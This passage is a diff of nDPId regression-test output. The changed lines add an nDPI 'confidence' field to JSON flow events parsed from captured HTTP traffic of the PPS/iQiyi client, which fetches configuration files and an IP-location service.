5pcWl5aS5jb20vai9vdC9RWUFnZW50LnppcDtTdGFydEFnZW50OzRDRDQxOTkyNjI5ODBBRjY5RDA3OThEREFBNDJGM0M5DQptYXNmbGFnPWh0dHA6Ly9tYmRhcHAuaXFpeWkuY29tL2ovb3QvbWFzZmxhZy56aXA7U3RhcnQ7RTNGRDlCMjEzMEFCQTIxNTc1QjRGNDk2RDg5Q0FGOTINCm1hc2F1dG89aHR0cDovL21iZGFwcC5pcWl5aS5jb20vai9vdC9tYXNhdXRvLnppcDtTdGFydDtEMTQ3M0E5Mjg2MjBENjZGMzM0QjI4RUYxRjk0QjA3OA0KbWFzYmxvZz1odHRwOi8vbWJkYXBwLmlxaXlpLmNvbS9qL290L21hc2Jsb2cuemlwO1N0YXJ0O0JGRENCNTM1QzNFRUIwMkZEREI5NjFEMDVBNTIzQjI2DQpDb29raWVDbGVhcj1odHRwOi8vbWJkYXBwLmlxaXlpLmNvbS9qL290L0Nvb2tpZUNsZWFyLnppcDtTdGFydDtGMzlBRDlFOTgzREJCMzA5MkYxQzNDNDIwRjJBNDgyQQ=="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1402,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190110,"flow_last_seen":1467353190110,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1467353190110,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1402,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1467353190110,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1467353190110,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5kJVAADMGqbHKbA7bwKhzCABQxUpzStvEq5YvP1AYADaqqAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjI5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="}
@@ -333,201 +334,201 @@
 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1406,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1467353190235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1467353190235,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5FPVAADMGJVLKbA7bwKhzCABQxHdtLPk6vNGSM1AYANYfVAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjI5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1407,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190634,"flow_last_seen":1467353190634,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1467353190634,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00637{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1407,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1467353190634,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"ts_msec":1467353190634,"pkt":"TF4M6gNlABxCjnAxCABFAAC4LnBAAIAGTvHAqHMI3xpqE8VMAFCjClS\/APxWfFAYQTf8ogAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL1FZQWdlbnQuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IFFZQWdlbnRfcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"}
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1407,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190634,"flow_last_seen":1467353190634,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1467353190634,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50508,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/QYAgent.ini","code":0,"content_type":"","user_agent":"QYAgent_runxx"}}
+00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1407,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190634,"flow_last_seen":1467353190634,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1467353190634,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50508,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/QYAgent.ini","code":0,"content_type":"","user_agent":"QYAgent_runxx"}}
 00933{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1408,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":1467353190638,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":420,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":420,"pkt_l4_len":386,"ts_msec":1467353190638,"pkt":"ABxCjnAxTF4M6gNlCABFAAGWcOxAADgGU5ffGmoTwKhzCABQxUwA\/FZ8owpVT1AYAB8JQAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMCBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogMjUNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkV4cGlyZXM6IEZyaSwgMDEgSnVsIDIwMTYgMDY6MzA6MDcgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANCkFjY2Vzcy1Db250cm9sLUFsbG93LU9yaWdpbjogKg0KWC1DYWNoZTogSElUIGZyb20gMTAuMTIxLjMzLjk3DQpYLUNhY2hlOiBISVQgZnJvbSAyMjMuMjYuMTA2LjE5DQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KDQpbUVlBZ2VudF0NCnY9MA0KcD0xMDANCmU9"}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1409,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190892,"flow_last_seen":1467353190892,"flow_idle_time":7440000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":1,"ts_msec":1467353190892,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.38.219.107","src_port":50509,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00593{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1467353190892,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":163,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":163,"pkt_l4_len":129,"ts_msec":1467353190892,"pkt":"TF4M6gNlABxCjnAxCABFAACVLoRAAIAGUpzAqHMIaibba8VNAFAdei0\/k1iI9FAYQTd0xwAAR0VUIC9jaXR5anNvbiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUVlBZ2VudF9ydW54eA0KSG9zdDogaXBsb2NhdGlvbi5nZW8ucWl5aS5jb20NCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCg=="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1409,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190892,"flow_last_seen":1467353190892,"flow_idle_time":7440000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":1,"ts_msec":1467353190892,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.38.219.107","src_port":50509,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"iplocation.geo.qiyi.com","url":"iplocation.geo.qiyi.com\/cityjson","code":0,"content_type":"","user_agent":"QYAgent_runxx"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1409,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190892,"flow_last_seen":1467353190892,"flow_idle_time":7440000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":1,"ts_msec":1467353190892,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.38.219.107","src_port":50509,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"iplocation.geo.qiyi.com","url":"iplocation.geo.qiyi.com\/cityjson","code":0,"content_type":"","user_agent":"QYAgent_runxx"}}
 01036{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1410,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":1467353190978,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":497,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":497,"pkt_l4_len":463,"ts_msec":1467353190978,"pkt":"ABxCjnAxTF4M6gNlCABFAAHjK+5AADIGoeRqJttrwKhzCABQxU2TWIj0HXotrFAYAOXEmAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eQ0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMCBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC9odG1sO2NoYXJzZXQ9dXRmLTgNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LVR5cGU6IGNoYXJzZXQ9dXRmLTgNCg0KZjINCnZhciByZXR1cm5JcENpdHkgPXsiY29kZSI6IkEwMDAwMCIsICJkYXRhIjogeyJpcCI6IjExOC4xNjMuOC45MCIsICJpc3AiOiLkuK3ljY7nlLXkv6EiLCAiY291bnRyeSI6IuS4reWbveWkp+mZhiIsICJwcm92aW5jZSI6IuWPsOa5viIsICJjaXR5IjoiTm9uZSIsICJpc3BfaWQiOjY5LCAiY291bnRyeV9pZCI6NDgsICJwcm92aW5jZV9pZCI6MjI4LCAiY2l0eV9pZCI6MjI4MDAwLCAibG9jYXRpb25faWQiOjY5MjI4MDAwfX0KDQo="}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1411,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":3,"flow_last_seen":1467353190978,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":25,"ts_msec":1467353190978,"pkt":"ABxCjnAxTF4M6gNlCABFAAAtK+9AADIGo5lqJttrwKhzCABQxU2TWIqvHXotrFAYAOXCuQAAMA0KDQoA"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1413,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191500,"flow_last_seen":1467353191500,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1467353191500,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1413,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1467353191500,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"ts_msec":1467353191500,"pkt":"TF4M6gNlABxCjnAxCABFAAC4L9BAAIAGTZDAqHMI3xpqFMZOAFCUEYDiYZCIJlAYQTcJ9QAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc2ZsYWcuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG1hc2ZsYWdfcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"}
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1413,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191500,"flow_last_seen":1467353191500,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1467353191500,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50766,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masflag.ini","code":0,"content_type":"","user_agent":"masflag_runxx"}}
+00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1413,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191500,"flow_last_seen":1467353191500,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1467353191500,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50766,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masflag.ini","code":0,"content_type":"","user_agent":"masflag_runxx"}}
 01033{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1414,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":2,"flow_last_seen":1467353191505,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":493,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":493,"pkt_l4_len":459,"ts_msec":1467353191505,"pkt":"ABxCjnAxTF4M6gNlCABFAAHfpuJAADgGHVffGmoUwKhzCABQxk5hkIgmlBGBclAYAB+\/UwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMSBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogOTgNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkV4cGlyZXM6IEZyaSwgMDEgSnVsIDIwMTYgMDY6MTI6MTAgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTM2MDANCkFjY2Vzcy1Db250cm9sLUFsbG93LU9yaWdpbjogKg0KWC1DYWNoZTogSElUIGZyb20gMTAuMTIxLjMzLjk3DQpYLUNhY2hlOiBISVQgZnJvbSAyMjMuMjYuMTA2LjIwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KDQpbbWFzZmxhZ10NCnY9Mg0KcD00MA0KZT2xsb6pL8nPuqMNCmFwcD1maWRkbGVyLHdpcmVzaGFyayxIdHRwV2F0Y2gsSHR0cFdhdGNoIFN0dWRpbyxIdHRwQW5hbHl6ZXINCg=="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1415,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191521,"flow_last_seen":1467353191521,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1467353191521,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50767,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1415,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1467353191521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"ts_msec":1467353191521,"pkt":"TF4M6gNlABxCjnAxCABFAAC4L9RAAIAGTYzAqHMI3xpqFMZPAFCekgJEnvl6klAYQTcvHQAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc2F1dG8uaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG1hc2F1dG9fcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"}
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1415,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191521,"flow_last_seen":1467353191521,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1467353191521,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50767,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masauto.ini","code":0,"content_type":"","user_agent":"masauto_runxx"}}
+00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1415,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191521,"flow_last_seen":1467353191521,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1467353191521,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50767,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masauto.ini","code":0,"content_type":"","user_agent":"masauto_runxx"}}
 01079{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1416,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":1467353191524,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":526,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":526,"pkt_l4_len":492,"ts_msec":1467353191524,"pkt":"ABxCjnAxTF4M6gNlCABFAAIAVHFAADgGb6ffGmoUwKhzCABQxk+e+XqSnpIC1FAYAB\/e1QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozMSBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogMTMwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjUwOjIzIEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0zNjAwDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45Nw0KWC1DYWNoZTogSElUIGZyb20gMjIzLjI2LjEwNi4yMA0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KW21hc2F1dG9dDQp2PTENCnA9MQ0KZT2xsb6pL8nPuqMvuePW3S\/J7tvaDQpzPb2ty9Uv1eO9rS\/JvbarL7rTxM8NCmFwcD1maWRkbGVyLHdpcmVzaGFyayxIdHRwV2F0Y2gsSHR0cFdhdGNoIFN0dWRpbyxIdHRwQW5hbHl6ZXINCg=="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1417,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191538,"flow_last_seen":1467353191538,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":1,"ts_msec":1467353191538,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50765,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1417,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1467353191538,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"ts_msec":1467353191538,"pkt":"TF4M6gNlABxCjnAxCABFAAD6L9ZAAIAGlfnAqHMIJG7cD8ZNAFCivUMktEgQ8FAY\/\/DARAAAR0VUIC90bXBzdGF0cy5naWY\/bWV0aG9kPXFpdWJpdGVyJm9zPXdpbmRvd3MtNi4xLjc2MDFfc3AxJnV1aWQ9MzUwQzNGMUFDNzVENDBiYzkwRDYwMkRBNEU2N0E3MkQmc29mdHZlcnNpb249MS4wLjAuMSZzb3VyY2U9cHBzJnRhc2t0eXBlPWdldHRhc2tpbmZvIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRSVlpQW5nZW50DQpIb3N0OiBtc2cudmlkZW8ucWl5aS5jb20NCg0K"}
-00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1417,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191538,"flow_last_seen":1467353191538,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":1,"ts_msec":1467353191538,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50765,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.video.qiyi.com","url":"msg.video.qiyi.com\/tmpstats.gif?method=qiubiter&os=windows-6.1.7601_sp1&uuid=350C3F1AC75D40bc90D602DA4E67A72D&softversion=1.0.0.1&source=pps&tasktype=gettaskinfo","code":0,"content_type":"","user_agent":"QIYiAngent"}}
+00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1417,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191538,"flow_last_seen":1467353191538,"flow_idle_time":7440000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":1,"ts_msec":1467353191538,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50765,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.video.qiyi.com","url":"msg.video.qiyi.com\/tmpstats.gif?method=qiubiter&os=windows-6.1.7601_sp1&uuid=350C3F1AC75D40bc90D602DA4E67A72D&softversion=1.0.0.1&source=pps&tasktype=gettaskinfo","code":0,"content_type":"","user_agent":"QIYiAngent"}}
 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1418,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":3,"flow_last_seen":1467353191556,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1467353191556,"pkt":"TF4M6gNlABxCjnAxCABFAAC5L9hAAIAGTYfAqHMI3xpqFMZPAFCekgLUnvl8alAYQMHSJwAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc3JlY29tLmluaSBIVFRQLzEuMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBtYXNhdXRvX3J1bnh4DQpIb3N0OiBzdGF0aWMucWl5aS5jb20NCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCg=="}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1423,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191604,"flow_last_seen":1467353191604,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1467353191604,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1423,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1467353191604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"ts_msec":1467353191604,"pkt":"TF4M6gNlABxCjnAxCABFAAC4L+lAAIAGTXjAqHMI3xpqE8ZQAFAEnujgm7SOJVAYQTfnOwAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc2Jsb2cuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG1hc2Jsb2dfcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"}
